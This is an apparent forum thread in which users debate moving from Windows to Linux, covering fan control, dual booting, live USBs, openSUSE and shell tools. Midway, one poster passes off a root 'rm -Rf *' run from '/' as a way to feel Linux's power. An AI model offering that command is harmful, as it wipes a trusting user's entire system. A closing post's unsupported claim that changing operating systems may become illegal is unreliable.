My CPU Fan is realy noisy when on 100%, so I tune it down to 30% with SpeedFan Application.

The only reason why I haven't been running Linux is because I couldn't find a way of controlling Fan Speeds.

Does anyone know how I could?
 Quoting: Anonymous Coward 761712

You could probably regulate the Fan Speed in your BIOS comrade! Just be wary of what you change.

Hey op, I am using windows 7 (cracked), so i just have updated until the sp2,
recently i figured that begins to present a kind of little breaks,
and seems the problems just will get bigger without the update.
So i am realy considering in change it to Linux, however, i worry about incompatibilities of programs and games,
my son plays on my computer and he will be pissed if i not reinstall the games.

 Quoting: Tatsuya

I like this idea of having both OS on my machine. Then I could learn Linux at my leisure and get rid of Windows once I know what I'm doing. My computer has 360 Gigs of free space left on the HD so I don't see a problem having both.
Would I just boot into Linux at the start up when I get the boot prompt?
 Quoting: my 2 cents

If you just want to try linux, you can easily download a WUBI (basically the version installs within windows, and can just as easily be uninstalled from windows like any program), most distros these days have a WUBI choice, as for specific distros, well i'm not the best person to ask, the only ones i've used were ubuntu a while back and linux mint, so i haven't used linux in a while due to my pc gaming needs.
Most distro's should have a WUBI now though, excluding ones like slackware of course, so ask around and see if anyone has a version they can suggest.

If your computer can boot from usb drives, Unetbootin is a great way to check out all the distro's without wasting cd's or dvd's.

UNetbootin allows you to create bootable Live USB drives for Ubuntu, Fedora, and other Linux distributions without burning a CD. It runs on Windows, Linux, and Mac OS X.

True, but i'm a cheapskate, i'd prefer booting from a USB flash drive, and not spend 40 cents on something i'm not sure i'd want to keep.

But when i tried it last, that wasn't an option, so i forgot.

If only I could get my Unix (Ubuntu) distribution to compile WRF model with CUDA support. I admit I've came the closest on Unix, but still no OS to day that I've tried offered the right solution for me.

(PS!) Good luck playing anything more then FreeCiv on your Unix box, they are workhorses and mostly scientific computers. Now back to the present age, you will surely not be able to run two of my favorite games (Trainz and Wargame:European Escalation.) on it without much hassle. All those are purely my opinions of the whole Unix experience. (Have some nostalgia, install Knoppix!)

I use Linux because Microsoft abuses their customers. The way Windows works, they assume their entire user base is a criminal enterprise and the operating system operates off of that assumption.

Change a hard drive, reactivate Windows, change motherboard, reactivate Windows, change video card, oops, you can't reactivate Windows on your own anymore, now you have to call this number and waste your life trying to explain to some dipshit why you want to use your computer with software you legally paid for, in a manner that you best see fit for your use.

If they don't like your answer, tough shit, buy another license or turn into the criminal they always assumed you were by hacking Windows and being done with it, all so Bill Gates can give out $100,000 awards for condoms.

Oh Cool! Way to go.
If you really want to feel the power of linux type the following lines in a terminal as root.
cd /
rm -Rf *

enjoy!!!

LOVE LOVE LOVE this operating system!!

I went with the big deal first, (Linux Mint) but I didn't like it much to be honest. It had crash issues on my computer, the graphics were messed up a little here and there and I just didn't care for the whole look of it.

I was almost ready to give up and go back to Windows and came across a version of Linux called OpenSuse.

O.M.G.

WHAT A DIFFERENCE!! Much nicer in appearance than Mint and it hasn't crashed on me a single time in the week that I've had it.

I mean this layout is bad ass and the different things you can do with graphics and customizing your desktop are sweet. It runs VERY close to how Windows runs too so you don't have to learn a whole new skill set to get started.

If you're on the fence about Linux, trust me, they have fixed the issues, go for it. You won't regret it. It has no backdoors like Windows does, it's ENCRYPTED, it is ENTIRELY open source which means others can add to it and make it better. You really can't ask for anything more, Linux is the shit.

And it's FREE!! 5a

I have the newest version of OpenSuse, 12.2 with the KDE desktop. If you don't know what that means, like me, it's no problem, the OpenSuse website guides you every step of the way and allows you to choose which desktop you run.

Download the file, burn the image to a DVD and you're done.

I also love being able to keep my Windows with it and I have a choice which one I want to use before the computer boots up.

One thing I have noticed is that Linux doesn't support blueray/HD 1080p, so I keep a copy of Windows on my hard drive that I use solely for that. On the other hand Linux plays streaming HD content MUCH better than the other so I go to OpenSuse for that and general everyday surfing etc.

AMAZING!

If you want to get started, I can help with the setup and questions.

bottom-line: the default shell in windows is capable of very few things. by the way, if you talk about the windows shell, are you talking about the default commandline, the netsh stack, the recovery console or the new powershell?

even if windows had a real shell, it would be quite useless without the many commandline tools you have a unix box. unixes had a plethora of very usefull commandline tools for three decades now. and windows still has very few. sure, there are a lot of usefull commandline tools in %system32%, but once again, it is only a fraction of what you have on a real operating system.

True - Window's "shell" of any kind is no match for a UNIX shell. Even though I do quite a bit of GUI stuff, nothing beats a nice shell and I always have one open. The command line on Windows gets used as a last resort...

Glad you like GNU/Linux. I've been using it for about four years as my main OS. I also settled on openSUSE. For the idiots who can't think for themselves:

1. Why pay for a proprietary OS when you can get a better one for nothing?

2. Why pay for a proprietary OS when you can get one that respects your rights and yet comes at no cost?

3. Why pay for a proprietary OS which is (far) less secure that one that costs nothing?

4. Why pay for a proprietary OS when, should you so desire, you have permission (in law) to modify/improve it?

5. Why pay for a proprietary OS which treats you like an idiot (ok, you probably are an idiot)?

6. Why pay for a proprietary OS which has enslaved you and discourages you from learning to respect yourself and your rights?

Xubuntu 13.04 beta here
+1
best system evah
my machine runs fast as never before
Im done with windows since Ive made my own megamodded barebone version (win7 sp1) - I use it only if neccessary since most things can be done from wine or virtualbox
some may say games are the problem but you can run almost any if you have some basic knowledge

the best thing are:
windows cant see linux - linux controlls everything
I can run almost everything and mod, controll, check, clean etc etc everything
Linux is the virus creator and cleaner.
Its safe and is easy to modify. You controll every aspect of the system.

There are aspects that "normal" user will never understand and thats why I will not propose it to them.
Its "elite" IMO xD

Not to answer for the other AC, but there are so many things it makes it hard to narrow down without specific-use cases. So, as a singular example - if you are working in web design or software programming, the command-line text processing tools are incredibly powerful for making changes, renaming files, etc. Another example would be system maintenance. Since most UNIX-based or UNIX-like systems use text configuration files, it makes administration very fast and simple. That's two, there are plenty of others. Unfortunately, without having experienced both, it's hard to imagine the difference between them and somewhat difficult to explain them. The other AC posted links to two different shells' manual files - even a quick glimpse through those would give you a pretty good idea of what they are capable of. Now, if all you do is surf the web and play games or do photoshop, you'd never know the difference, so it is all about YOUR workflow.

Re: Linux is AWESOME!!!
sadly, as much as i like linux,
i have read that windows and intell, and the major makers
of computers are going to to the one OS system per computer,
based in the bios or computer hardware,
so at some point linux users will be shit out luck.
they will just make it against the law, if they allready have not, to chnage your OS.
